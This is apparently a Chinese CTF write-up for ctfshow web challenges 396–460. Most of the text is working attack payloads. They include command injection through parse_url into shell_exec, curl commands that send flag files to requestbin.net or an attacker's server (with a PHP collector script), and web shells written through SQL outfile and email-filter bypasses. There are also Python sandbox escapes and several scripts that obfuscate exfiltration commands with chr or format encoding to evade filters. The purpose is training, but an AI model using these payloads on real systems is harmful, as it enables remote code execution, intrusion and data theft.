文章目录
- 说在前面
- Web396(下面其实有通杀的但是得多试试其他的)
- Web397-Web401
- Web402
- We4b03
- Web404
- web405
- Web406
- Web407
- Web408
- Web409
- web410
- web411
- web412
- web413
- web414
- web415
- web416
- Web417
- web418
- web419
- web420
- web421-422
- web423
- web424-web431
- web432
- web433
- web434
- web435-436
- web437-438
- web439-440
- web441
- web442
- web443
- web444
- web445-447
- web448
- web449
- web450
- web451
- web452
- web453、455、456
- web454
- web457
- web458
- web459
- web460
说在前面
后面部分可能有些地方个别一两题题号写错了,我的锅抱歉
Web396(下面其实有通杀的但是得多试试其他的)
拿到源码
<?php
error_reporting(0);
if(isset($_GET['url'])){
$url = parse_url($_GET['url']);
shell_exec('echo '.$url['host'].'> '.$url['path']);
}else{
highlight_file(__FILE__);
}
内容是把host的内容内容写到path里面
url=http://`ls`/var/www/html/1.php
访问1.php发现fl0g.php
试了下没有结果
url=http://`cat fl0g.php`/var/www/html/3.php
算了没啥意义,直接curl外带吧,requestbin.net自己创一个
?url=http://www.baidu.com/1.php;curl -X POST -d "flag=`cat fl0g.php`" http://requestbin.net/r/1et3jvl1;
Web397-Web401
和上面方法一样
Web402
多加了点正则,说的是schema与host里面不能带这些字符,那我都丢在path里面就好啦
if(preg_match('/http|https/i', $url['scheme'])){
die('error');
}
if(!preg_match('/;|>|\||base/i', $url['host'])){
shell_exec('echo '.$url['host'].'> /tmp/'.$url['path']);
}
paylaod
url=www.baidu.com/1.php;curl -X POST -d "flag=`cat fl0g.php`" http://requestbin.net/r/1et3jvl1;
We4b03
error_reporting(0);
if(isset($_GET['url'])){
$url = parse_url($_GET['url']);
if(preg_match('/^((2[0-4]\d|25[0-5]|[01]?\d\d?)\.){3}(2[0-4]\d|25[0-5]|[01]?\d\d?)$/', $url['host'])){
shell_exec('curl '.$url['scheme'].$url['host'].$url['path']);
}
额没啥水平,就是加了一个正则是匹配指定ip嘛,这个正则不想解释,不懂的建议看一下正则表达式
url=http://227.220.220.21/1.php;curl -X POST -d "flag=`cat fl0g.php`" http://requestbin.net/r/1et3jvl1;
Web404
滑稽是不是发现一直是题目环境没好,F12发现要访问404.php
仔细看正则表达式你会发现和上一题不一样,少了一个^意味着前面部分可操控
这题就不能用requestbin.net了,至于为啥?
rquestbin给我们的url是http://requestbin.net/r/1et3jvl1后面多了两个/r/1let…这在parseurl的时候会默认认为后面是path造成截断,这样是不行的,建议自己本地php环境测试,不多说
解决方法是使用自己的服务器搭建一个类似的功能,先给payload,自己理解,抄答案害自己
404.php?url=http://;curl -X POST -d "q=`cat fl0g.php`" 42.xxx.xxx.xxx;0.0.0.11/f
服务器开启网站服务(只能是80端口),如果拼接:port,parseurl也会绕不过,所以你想nc监听也不行哈
index.php
<?php
$cookie = $_POST['q'];
$myFile = "res.txt";
file_put_contents($myFile, $cookie, FILE_APPEND);
?>
然后即可访问目录下res.txt获取flag
web405
上一题增强版,schema部分可控制
.://;curl -X POST -d "q=`ls`" 42.xxx.xxx.xxx;0.0.0.11/f
或者
php://;curl -X POST -d "q=`ls`" 42.xxx.xxx.xxx;0.0.0.11/f都行的
Web406
修复了环境了,不能时间盲注但是可以写马
<?php require 'config.php';$sql ='select flag from flag into outfile "/var/www/html/1.txt"';$result = $conn->query($sql);var_dump($result); ?>
转为16进制
http://a53d40ee-9871-49a0-8f4a-5463bc97e052.chall.ctf.show/?url=0://www.baidu.com;'union/**/select/**/1,0x3c3f70687020726571756972652027636f6e6669672e706870273b2473716c203d2773656c65637420666c61672066726f6d20666c616720696e746f206f757466696c6520222f7661722f7777772f68746d6c2f312e74787422273b24726573756c74203d2024636f6e6e2d3e7175657279282473716c293b7661725f64756d702824726573756c74293b203f3e/**/into/**/outfile/**/"/var/www/html/4.php"%23
访问1.txt即可
Web407
IPv6的128位地址通常写成8组,每组为四个十六进制数的形式。比如:AD80:0000:0000:0000:ABAA:0000:00C2:0002 是一个合法的IPv6地址。这个地址比较长,看起来不方便也不易于书写。零压缩法可以用来缩减其长度。如果几个连续段位的值都是0,那么这些0就可以简单的以::来表示
ip=cafe::add
而上面这个形式,刚好也是call_user_func调用类下函数的形式
Web408
payload
email="<?=system($_POST[1]);?>"@123.php
参考p神文章 FILTER_VALIDATE_EMAIL
可以不用点开了,主要是说非法字符可以放在双引号里面绕过检测
Web409
$email="echo`whoami`?>"@123.com
@后面是不符合php语句格式的字符尝试闭合网页当中前面的<?php
可行但是发现前面的"也是非法的
题目有个替换为.flag也就是把flag和它前面那个字符替换为空,这就可以把emai当中前面双引号这个非法字符给替换掉,避免在php环境里面出错
最终paylaod
email="flagsystem($_POST[1]);?>"@123.com
然后post数据
1=cat /flag
web410
?b=on
https://www.w3school.com.cn/php/filter_validate_boolean.asp
web411
?b=oN
web412
ctfshow=?><?php eval($_POST[1]);&1=system(‘cat flag.php’);
web413
ctfshow=/eval($_POST[1]);/&1=system(‘cat flag.php’);
web414
字符串intval为0
ctfshow=-1
web415
不区分大小写
k=getflaG
web416
f=ctf::flag
Web417
群主真骚,搞了一堆这个,经过我十分钟的缜密分析
传入?ctfshow=flag即可获取flag
web418
注意浏览器有进度条
post传入
key=a&clear=;echo cat flag.php > index3.txt;&die=0
web419
限制长度,套娃即可
code=eval($_POST[1]);&1=system('cat flag.php');
web420
code=nl ../*
不知道为啥我curl不行,存个脚本
import requests
import time
payload = [
'>sh ',
'>ba\\',
'>\|\\',
'>2\\',
'>2x\\',
'>xxx.\\',
'>9x.\\',
'>1\\',
'>2.\\',
'>4\\',
'>\ \\',
'>curl\\',
# '>cu\\',
]
for i in payload:
# assert len(i) <= 8
data = {
'code': str(i)
}
r = requests.post('http://6171141f-4d7c-447c-b0f6-1c92f0abd9be.chall.ctf.show/', data=data)
print(i)
time.sleep(1)
web421-422
其实有很多,这里我比较懒直接通杀还有诸如ls -t这种
先输入
>cat
再输入
*
web423
?code=str(''.__class__.__bases__[0].__subclasses__()[185].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').__dict__['pop'+'en']('curl http://xx.xx.xx.xx?1=`cat /flag`'))
web424-web431
一把梭
?code=空格str(open('/flag').read())
web432
http://a43c5775-1d73-4130-9e3f-854ab30caa0b.chall.ctf.show/?code=str(''.__class__.__bases__[0].__subclasses__()[185].__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').__dict__['pop'+'en']('curl http://xx.xx.xx.xx?1=`cat /flag`'))
web433
http://02367530-ac8c-49ca-a771-bc6d431e7e58.chall.ctf.show/?code=str(''.__class__.__bases__[0].__subclasses__()[185].__init__.__globals__['__buil''tins__']['__imp'+'ort__']('o'+'s').__dict__['pop'+'en']('curl http://xx.xx.xx.xx?1=`cat /flag`'))
web434
http://d866760a-411d-4189-90e8-d431736e3a2c.chall.ctf.show/?code=str(''.__class__.__bases__[0].__subclasses__()[185].__init__.__globals__['__buil''tins__']['__imp'+'ort__']('o'+'s').__dict__['pop'+'en']('wget http://xx.xx.xx.xx?1=`cat /fl*`'))
web435-436
?code=str(exec('import o\x73;o\x73.\x73ystem(\"\\u0063\\u0075\\u0072\\u006c\\u0020\\u0068\\u0074\\u0074\\u0070\\u003a\\u002f\\u002f\\u0034\\u0032\\u002e\\u0031\\u0039\\u0032\\u002e\\u0031\\u0033\\u0037\\u002e\\u0032\\u0031\\u0032\\u003f\\u0031\\u003d\\u0060\\u0063\\u0061\\u0074\\u0020\\u002f\\u0066\\u006c\\u0061\\u0067\\u0060\")'))
"{0:c}{1:c}{2:c}{3:c}{4:c}{5:c}{6:c}{7:c}{8:c}{9:c}{10:c}{11:c}{12:c}{13:c}{14:c}{15:c}{16:c}{17:c}{18:c}{19:c}{20:c}{21:c}{22:c}{23:c}{24:c}{25:c}{26:c}{27:c}{28:c}{29:c}{30:c}{31:c}{32:c}{33:c}{34:c}{35:c}{36:c}{37:c}{38:c}{39:c}{40:c}{41:c}{42:c}{43:c}{44:c}{45:c}{46:c}{47:c}{48:c}{49:c}{50:c}{51:c}{52:c}{53:c}{54:c}{55:c}{56:c}{57:c}{58:c}{59:c}{60:c}{61:c}{62:c}".format(105,109,112,111,114,116,32,111,115,59,111,115,46,115,121,115,116,101,109,40,34,99,117,114,108,32,104,116,116,112,58,47,47,52,50,46,49,57,50,46,49,51,55,46,50,49,50,63,49,61,96,99,97,116,32,47,102,108,97,103,96,34,41)
s = 'import os;os.system("curl http://xx.xx.xx.xx?1=`cat /flag`")'
res = '"'
j = 0
for i in s:
res += ("{"+f"{j}:c"+"}")
j += 1
res += '".format('
j = 0
for i in s:
res += f'{ord(i)},'
j += 1
res = res[:-1]
res = res+")"
print(res)
print(eval(res))
web437-438
?code=str(exec('import o\x73;o\x73.\x73ystem(\"\x63\x75\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x34\x32\x2e\x31\x39\x32\x2e\x31\x33\x37\x2e\x32\x31\x32\x3f\x31\x3d\x60\x63\x61\x74\x20\x2f\x66\x6c\x61\x67\x60")'))
web439-440
s = 'import os;os.system("curl http://xx.xx.xx.xx?1=`cat /flag`")'
res = ''
for i in s:
res += f"chr({ord(i)})%2B"
print(res[:-3])
code=str(exec(chr(105)%2Bchr(109)%2Bchr(112)%2Bchr(111)%2Bchr(114)%2Bchr(116)%2Bchr(32)%2Bchr(111)%2Bchr(115)%2Bchr(59)%2Bchr(111)%2Bchr(115)%2Bchr(46)%2Bchr(115)%2Bchr(121)%2Bchr(115)%2Bchr(116)%2Bchr(101)%2Bchr(109)%2Bchr(40)%2Bchr(34)%2Bchr(99)%2Bchr(117)%2Bchr(114)%2Bchr(108)%2Bchr(32)%2Bchr(104)%2Bchr(116)%2Bchr(116)%2Bchr(112)%2Bchr(58)%2Bchr(47)%2Bchr(47)%2Bchr(52)%2Bchr(50)%2Bchr(46)%2Bchr(49)%2Bchr(57)%2Bchr(50)%2Bchr(46)%2Bchr(49)%2Bchr(51)%2Bchr(55)%2Bchr(46)%2Bchr(50)%2Bchr(49)%2Bchr(50)%2Bchr(63)%2Bchr(49)%2Bchr(61)%2Bchr(96)%2Bchr(99)%2Bchr(97)%2Bchr(116)%2Bchr(32)%2Bchr(47)%2Bchr(102)%2Bchr(108)%2Bchr(97)%2Bchr(103)%2Bchr(96)%2Bchr(34)%2Bchr(41)))
web441
str().join([chr(105),chr(109),chr(112),chr(111),chr(114),chr(116),chr(32),chr(111),chr(115),chr(59),chr(111),chr(115),chr(46),chr(115),chr(121),chr(115),chr(116),chr(101),chr(109),chr(40),chr(34),chr(99),chr(117),chr(114),chr(108),chr(32),chr(104),chr(116),chr(116),chr(112),chr(58),chr(47),chr(47),chr(52),chr(50),chr(46),chr(49),chr(57),chr(50),chr(46),chr(49),chr(51),chr(55),chr(46),chr(50),chr(49),chr(50),chr(63),chr(49),chr(61),chr(96),chr(99),chr(97),chr(116),chr(32),chr(47),chr(102),chr(108),chr(97),chr(103),chr(96),chr(34),chr(41)])
web442
exec(request.args.get(str(None)))&None=import os;os.system("curl http://xx.xx.xx.xx?1=`cat /flag`")
当然可以构造数字hh
print((len(str(None))*len(str(None))*len(str(None))+len(str(None))))
print(chr(68))
web443
def getNumber3(number):
number = int(number)
if number in [-2, -1, 0, 1]:
return ["~int((len(str(None))/len(str(None))))", "~int(len(str()))",
"int(len(str()))", "int((len(str(None))/len(str(None))))"][number + 2]
if number % 2:
return "~%s" % getNumber3(~number)
else:
return "(%s<<(int((len(str(None))/len(str(None))))))" % getNumber3(number / 2)
s = 'import os;os.system("curl http://xxxx?1=`cat /flag`")'
res = 'str().join(['
for i in s:
res += f"chr({getNumber3(ord(i))}),"
res = res[:-1]
res += '])'
print(res)
web444
def getNumber3(number):
number = int(number)
if number in [-2, -1, 0, 1]:
return ["~int(True)", "~int(False)",
"int(False)", "int(True)"][number + 2]
if number % 2:
return "~%s" % getNumber3(~number)
else:
return "(%s<<(int(True)))" % getNumber3(number / 2)
def getNumber2(number):
number = int(number)
if number in [-2, -1, 0, 1]:
return ["~([]<())", "~([]<[])",
"([]<[])", "([]<())"][number + 2]
if number % 2:
return "~%s" % getNumber2(~number)
else:
return "(%s<<([]<()))" % getNumber2(number / 2)
s = 'import os;os.system("curl http://xxxx?1=`cat /flag`")'
# s = '123'
res = 'str().join(['
for i in s:
res += f"chr({getNumber3(ord(i))}),"
res = res[:-1]
res += '])'
print(res)
web445-447
reload重新加载模块
s = 'from importlib import reload;import os;reload(os);os.system("curl http://xxxx?1=`cat /flag`")'
web448
import sys;sys.modules['os']='/usr/local/lib/ python3.8/os.py';import os;os.system()
或者
Python包的环境变量有很多个,优先sys,waf是读到sys,os为none, 所以报错解决方式可以把他删了,系统找不到就会去下一个环境变量找
import sys
del sys.modules['os']
import os
os.system()
web449
盲注,思路是这个自己动手,啥都给你了,生成payload的代码我也给了
import time;f=open("/flag").read(1);time.sleep(3) if f=="c" else 2
web450
phpinfo^phpinfo^phpinfo
web451
aaahppo^phphppo^aaainfo
web452
((p).(h).(p).(i).(n).(f).(o))();
web453、455、456
http://f22d6fe3-0c9d-44bb-b78b-a6a8c166a606.chall.ctf.show/ctf/file
s=<?php system('curl http://4x.xxx.xxx7.2xx?1=`ls`'); ?>
http://f22d6fe3-0c9d-44bb-b78b-a6a8c166a606.chall.ctf.show/ctf/exec
web454
http://3adee915-6f8f-4cb2-b195-2180e9a8e272.chall.ctf.show/ctf/file
s=<?php system('curl http://4x.xxx.xxx7.2xx?1=`cat flaaags`'); ?>
http://f22d6fe3-0c9d-44bb-b78b-a6a8c166a606.chall.ctf.show/ctf/include
web457
进入第二个语句即可
?u=admin&p=phpinfo
web458
hint:
get_class (): 获取当前调用方法的类名;
get_called_class():获取静态绑定后的类名;
web459
hint:
可以配合伪协议得到flag,所以接下来怎么做不多说了,之后访问页面base64解码即可
web460
hint:配合urllib外带数据,感觉题目有点变味了,没啥必要
s = 'import urllib.request;import ssl;f=open("/flag").read(100);context = ssl._create_unverified_context();url = "http://xxx?1="+f;request = urllib.request.Request(url);response = urllib.request.urlopen(url=request,context=context)'